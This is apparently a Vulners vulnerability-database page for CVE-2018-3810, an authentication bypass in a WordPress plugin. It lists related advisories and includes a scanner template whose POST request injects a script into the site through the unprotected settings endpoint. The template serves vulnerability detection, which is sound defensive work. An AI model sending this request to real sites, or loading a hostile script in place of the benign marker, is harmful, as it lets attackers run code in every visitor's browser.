Vulners
Lucene search
Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | WordPress Smart Google Code Inserter Plugin < 3.5 - Authentication Bypass / SQL Injection | 3 Jan 201800:00 | – | zdt |
 | CVE-2018-3810 | 3 Jan 201800:00 | – | circl |
 | WordPress Oturia Smart Google Code Inserter plugin authentication bypass vulnerability | 4 Jan 201800:00 | – | cnvd |
 | CVE-2018-3810 | 1 Jan 201806:00 | – | cve |
 | CVE-2018-3810 | 1 Jan 201806:00 | – | cvelist |
 | WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass / SQL Injection | 3 Jan 201800:00 | – | exploitdb |
 | WordPress Plugin Smart Google Code Inserter 3.5 - Authentication Bypass SQL Injection | 3 Jan 201800:00 | – | exploitpack |
 | CVE-2018-3810 | 1 Jan 201806:29 | – | nvd |
 | WordPress Smart Google Code Inserter SQL Injection | 3 Jan 201800:00 | – | packetstorm |
 | WordPress Smart Google Code Inserter plugin <= 3.4 - Unauthenticated Cross-Site Scripting (XSS) vulnerability | 8 Jan 201800:00 | – | patchstack |
10
id: CVE-2018-3810
info:
name: Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass
author: princechaddha
severity: critical
description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.
impact: |
An attacker can bypass authentication and gain unauthorized access to the affected WordPress site.
remediation: |
Update to the latest version of the Oturia WordPress Smart Google Code Inserter plugin (3.5 or higher) to fix the authentication bypass vulnerability.
reference:
- https://www.exploit-db.com/exploits/43420
- https://nvd.nist.gov/vuln/detail/CVE-2018-3810
- https://wordpress.org/plugins/smart-google-code-inserter/#developers
- https://limbenjamin.com/articles/smart-google-code-inserter-auth-bypass.html
- https://wpvulndb.com/vulnerabilities/8987
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-3810
cwe-id: CWE-287
epss-score: 0.91477
epss-percentile: 0.99799
cpe: cpe:2.3:a:oturia:smart_google_code_inserter:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: oturia
product: smart_google_code_inserter
framework: wordpress
tags: cve,cve2018,wordpress,google,edb,oturia,vkev,vuln
http:
- method: POST
path:
- "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
body: 'sgcgoogleanalytic=<script>console.log("document.domain")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- '<script>console.log("document.domain")</script>'
- type: status
status:
- 200
# digest: 490a00463044022036273c95fe1fcf7624c59a91aac0876155535686bd12b51adc29852ff9473905022020fd13f8241dd723f77edd27968c336e90e60f404c3caee4864b2f9c5c47a9b3:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.6High risk
Vulners AI Score8.6
CVSS 27.5
CVSS 39.8
EPSS0.91477